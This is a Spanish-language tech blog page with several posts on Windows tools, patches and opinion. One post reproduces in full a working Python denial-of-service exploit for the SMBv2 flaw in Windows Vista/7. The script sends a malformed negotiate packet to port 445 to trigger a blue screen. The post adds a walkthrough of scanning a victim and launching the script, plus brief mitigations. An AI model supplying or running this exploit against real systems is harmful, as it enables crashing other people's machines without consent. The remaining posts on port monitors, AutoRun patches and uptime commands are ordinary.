En Rincon Informático hablamos sobre esta GRAVE vulnerabilidad que está afectando a los usuarios de los sistemas operativos Windows Vista y Windows 2008 Server.  En respuesta de este problema Microsoft ha liberado una “solución” para los afectados; esta solución es llamada un “Fix it” o un arréglalo, el cual no es más que dos pequeños programas:

Uno que deshabilita SMBv2 y otro que habilita SMBv2.

¿Razones? Aun no lo entiendo, para mí esto no es parche, es simplemente un “truco” que servirá solo por unos momentos, además de ser molesto puesto que se perderán funcionalidades que provee SMBv2 mientras lo tengamos deshabilitado.  Lo único que se me ocurre que es Microsoft espere hasta Windows 7 para así “obligar” a los usuarios de Vista a que se “actualicen” a este otro Sistema Operativo.

Descargar “solución” de Microsoft. (deshabilitar)

Descargar “solución” de Microsoft. (habilitar)

Entrada dedicada a MMT, la muñeca oficialmente Profesional.

Muchas veces he participado en las discusiones  Windows Vs GNU/Linux, sin embargo, esta entrada no pretende convertirse en una mas de las miles que existen en la red sobre  esta rivalidad. Este pequeño articulo es un reflexion de como gracias a los problemas de los sistemas operativos de Microsoft  muchos informatico, tecnicos, e incluso ingenierios tienen  trabajo y por ende con que  comer.

Constantemente critico mucho  a Windows, por diversas razones:

• Inestabilidad.
• Velocidad
• Software Privativo
• Politicas de mercadeo.
• Monopolio.

Y muchas cosas mas,  esto son solo varios aspectos con los cuales no estoy de acuerdo con Windows y por eso no lo uso,  me parece que este sistema operativo es bastante flojo en rendimiento,  Igualmente me parece un poco ilogico pagar una alta suma de dinero por un  sistema que se cuelga sin explicacion alguna. No estoy de acuerdo con  muchas otras cosas de las cuales ya hemos hablado anteriormente en rincon informatico y la lista puede seguir dependiendo de que tan profundos queremos llegar.

No obstante, gracias a todas estas dificultades pero particularmente al bajo rendimiento y estabilidad de  este sistema operativo miles de informaticos tienen trabajo dando soporte y reparando estos errores tan comunes  que suelen suceder a diario, Si Windows  no fuera tan pobre, muchos de nosotros no hubieramos conocido, otras alternativas de sistemas operativos, por que asi fue que yo conoci el mundo del GNU/Linux y el Software Libre, por el incoformismo baja estabilidad que brinda Windows.

¿Y por que es el mas usado en el mundo?

Esta pregunta es facil de resolver, debido a que muchos usuarios solo le sinteresa la comodidad y facilidad a la hora de revisar su correo o chatear con otras personas.. aquellos usuarios no les importa saber que estan instalando, por que salio el famoso BSOD, o por que se reinicio, estos individuos solo les importa que funcione cuando lo necesitan.

Otro factor importante por lo cual Windows tiene muchos usuarios, es por la desinformacion, hay personas que estan cansadas  de los errores de windows pero no saben a que sistema operativo migrar, esto influye mucho los falsos mitos acerca de GNU/Linux  ya que  en la poblacion comun existe un miedo generalizado a usar   este sistema operativo,  miedo que entre todos los Linuxeros debemos exterminar. por que GNU/Linux hoy en dia es sencillo de usar, solo es cuestion de cambiar un poco la forma de hacer las cosas diarias que hacias en tu  Windows.

Finalmente  gracias a todo lo planteado anteriormente  podemos concluir con una curiosa paradoja, muchos informaticos dependen de que Windows sea pobre en rendimiento y confiabilidad para tener “con que comer”

Los Administradores de Redes, mantienen en la búsqueda de la herramienta ideal que los ayude a determinar que tipo de archivos se comparten entre los usuarios de la red.

Para evitarles “la fatiga” en Rincón Informático les presentamos una excelente herramienta que cumple en buena medida con esta necesidad.

LAN Search PRO es un software que nos permite buscar (así como suena) por tipo de extensión (si así lo deseamos) archivos en nuestra LAN, esa es de las cosas mas interesantes, pues si estamos auditando las carpetas compartidas podemos ejecutar busquedas de tipo:

• *.mp3
• *.mpg
• *.wmv

Y así con todas las extensiones de archivos que no hagan parte de la politica de archivos permitidos.

Tiene otras muy buenas opciones como: delimitar el ambito de la búsqueda, conectarse con otro usuario a las carpetas (credenciales de usuario) en fin, es un software que vale la pena tenerlo.

Ojo, no es Software Libre, es Software Gratis solamente.

Descargar LAN Search PRO.

Leyendo securitybydefault me encuentro con esta importante noticia, recientemente se encontro un fallo de seguridad  en el protocolo SMB de Windows Vista y Windows 7, este es el encargado de compartir archivos e impresoras  en los sistemas operativos de microsoft. Este bug, permite hacer un ataque DoS  (e incluso es posible la ejecucion remota de codigo) de forma remota mandando un paquete malformado. El ataque sera reflejado en el PC victima  con el ya conocido, tipico y normal “error de pantalla azul”, obligandolo a reiniciar.

Laurent Gaffié, quien descrubrio esta vulnerabilidad, ha creado un pequeño codigo en python, que permite explotar dicho bug,  lo unico necesario es tener la IP victima,  y que este por obvias razones este compartiendo archivos o impresoras, es decir, que tenga activado  el protocolo SMB 2.0 . el codigo es el siguiente:

#!/usr/bin/python
#When SMB2.0 recieve a “&” char in the “Process Id High” SMB header field
#it dies with a PAGE_FAULT_IN_NONPAGED_AREA error

from socket import socket
from time import sleep

host =”direccion_ip”, 445
buff = (
“\x00\x00\x00\x90″ # Begin SMB header: Session message
“\xff\x53\x4d\x42″ # Server Component: SMB
“\x72\x00\x00\x00″ # Negociate Protocol
“\x00\x18\x53\xc8″ # Operation 0×18 & sub 0xc853
“\x00\x26″# Process ID High: –> normal value should be “\x00\x00″
“\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe”
“\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54″
“\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31″
“\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00″
“\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57″
“\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61″
“\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c”
“\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c”
“\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e”
“\x30\x30\x32\x00″
)
s = socket()
s.connect(host)
s.send(buff)
s.close()

Para lanzarlo basta con ./archivo.py

No sobra  decir, que este bug, no afecta versiones anteriores de Windows.

Prueba de concepto.

Antes que nada, es necesario advertir, que esta prueba se hace con el UNICO fin  de educar y alertar a los usuarios de Microsoft Windows, para que esten atentos y tomen las medidas pertinentes para no ser victimas de algun l@mmer  lanzando ataques a diestra y siniestra.

El escenario es el siguiente:

Previamente se ha identificado nuestro objetivo, se ha obtenido su ip la cual es 192.168.8.120, gracias a un nmap estamos seguros de que sus sistema operativo es Windows Vista  y que tiene SMB activado.

Teniendo clara la ip de nuestra victima, modificamos el codigo en python y ponemos nuestra  ip victima en este caso 192.168.8.120, guardamos, procedemos a darle permisos a nuestro archivo y por ultimo lo ejecutamos:

chmod 777 archivo.py
./archivo.py

Como resultado en nuestra pc victima saldra un BSOD (Blue Screen of death), algo similar a este:

Soluciones.

Hasta el momento no existe parche por parte de Microsoft, sin embargo, este grave problema se puede solucionar de manera provisional deshabilitando SMB. o en su defecto filtrando los puertos 445 y 139. Asi que todos los usuarios de windows esten pendientes de este fallo y actualicen su sistema lo antes posible,  para evitar daños  y perdidas de informacion

Algunas personas que usan entornos Microsoft desean saber que puertos usan los programas que tienen instalados en sus computadores, para esto existen varias formas de hacerlo.

NOTA de Autor: Yo por ejemplo uso la línea de comandos, si ya se que suena “inverosímil” decir que se usa la línea de comandos para hacer algo en Windows pero hay comandos muy interesantes para este tipo de propósitos, uno de ellos es el famoso “netstat”, pero esta entrada intenta hacer esta misma actividad un poco mas sencillo.

En esta entrada veremos una par de programas que sirven para este propósito; el primero de ellos:

ProcNetMonitor

(no requiere instalación, es “portable” por así decirlo) Pesa aproximadamente 500 KB desarrollado por SecurityXploded fácil de usar y muestra información interesante acerca de cada uno de los procesos que se están ejecutando es nuestra maquina, tiene la ventaja de ver las propiedades del archivo que esta usando la conexión, así mismo de “matar” dicho proceso.

CurrPorts

(no requiere instalación, también es “portable” por así decirlo) Pesa menos de 60KB desarrollado por NirSoft. Personalmente me parece mas eficiente, es mas “feo” por decirlo de alguna manera y menos intuitivo que el anterior pero arroja por lo menos la misma información que PNM.

Curr Ports tiene una gran ventaja que sabrán usar los son Administradores de red y desean ver como se esta comportando determinado programa en un computador de la red, puesto que es posible ejecutarlo por “línea de comandos” y ver el resultado en un archivo HTML, pueden hacer la prueba así:

cports.exe /filter “include:process:firefox.exe /shtml “C:\mispuertosabiertos\puertos.html”

Con dicho “comandos” el programa solo traerá la información relacionada con el FAMOSO navegador Firefox y la dejara en un archivo que para este ejemplo lo llamamos “puertos.html”

Dejo a continuación los respectivos enlaces de descarga.

ProcNetMonitor

Curr Ports

En Rincón Informático ya hemos hablado sobre herramientas que nos permiten “inmunizar” nuestras memorias USB para evitar que los virus que se reproducen copiándose a estas las infecten:

Proteger tu memoria USB de Virus.

Como eliminar Virus en dispositivos USB desde GNU/Linux

Sin embargo tuvimos que esperar hasta Agosto para que Microsoft (¿Spectra?) se “dignara” a sacar un parche que evita el AutoRun cuando insertamos una memoria USB en el respectivo puerto.
Así que para una mayor seguridad les recomendaría a los usuarios de Windows que instalen este parche, que parece que tiene algo interesante. Dejos los respectivos enlaces de las diferentes versiones de Windows.

Windows XP

Windows Vista

Windows Vista 64 Bits

Windows Server 2003

Windows Server 2003 64 Bits

Windows Server 2003 Itaniun

Windows Server 2008

Windows Server 2008 64 Bits

Windows Server 2008 Itaniun

Esta entrada no sabia como iniciarla, es extraño, normalmente tengo claro como iniciar una entrada que quiera escribir y lo último que coloco es el titulo, pero esta vez fue diferente.

Windows es de manera absurda el Sistema Operativo mas usado en el mundo, de eso no cabe duda. Sin embargo lo es gracias en TODA la medida a la profunda ignorancia de los usuarios de computadores. Eso es otra verdad.
Aun no se porque seguimos usando este O.S. (Sistema operativo por sus siglas en ingles) si en realidad es tan incompleto, alguna vez leí a algún Linuxero que dijo:

Volveré a usar Windows, solo cuando este, traiga lector de PDF integrado.

Y tiene razón, un O.S. debe proveernos como mínimo de los estándares mundiales y PDF lo es.

Pero hoy no discutiré ese tema, el día de hoy necesitaba realizar otra acción, requería ver el “Uptime” de una maquina.

¿Uptime?

El “Uptime” es el tiempo que la maquina lleva encendida, ¿para que necesitaba saber eso?; ese es otro paseo que espero pueda escribir al respecto.
Después de buscar un poco encontré que una forma es ejecutando un comando, con un par de modificaciones, al mejor estilo de los ambientes GNU:

Systeminfo | Find “Up time”

Por razones que pueden ser obvias para el ojo “entrenado” este comando no funciona en los Windows que están en un idioma diferente al Ingles así que le cambie solo un par de palabras, dejándolo así:

Systeminfo | Find “Tiempo de actividad”

Que hace el comando…ejecuta una aplicación “inmensa” llamada “Systeminfo” y en la salida de este programa busca las palabras “Tiempo de actividad” (es case sensitive, es decir, distingue entre mayúsculas y minúsculas); dicho en otras palabras no es OPTIMO, es decir, no entrega SOLO la información que solicitada y la necesito así: SOLO el uptime de la máquina; no es algo “sencillo” como en GNU/Linux:

uptime

Y con eso lo tienes todo mucho mas rápido y sin “cargar” innecesariamente el computador.

Por eso el “Systeminfo” no es la mejor opción, es como comprar una “cajita feliz” solo por la sorpresa.

¿Entonces?

Seguí buscando y encontré otro comando:

net stats svr

Este es un poco mejor (en rendimiento), lo que estamos diciendo es que nos “muestre” las estadísticas del servicio “Servidor”, el problema de este comando es que nos indica desde cuando esta encendido el computador, es decir, nos dice una fecha, pero no el tiempo como tal, y eso es lo que necesito. (además que este comando no sirve en Vista)

Después de este ultimo desencanto procedo a seguir buscando y fue así como llegue a “uptime.exe” una aplicación aparte del O.S. que (¿por fin?) hace lo que necesito. Para usarlo, es cuestión de descargarlo y ejecutarlo por medio de un interprete de comandos.

Descargar Uptime.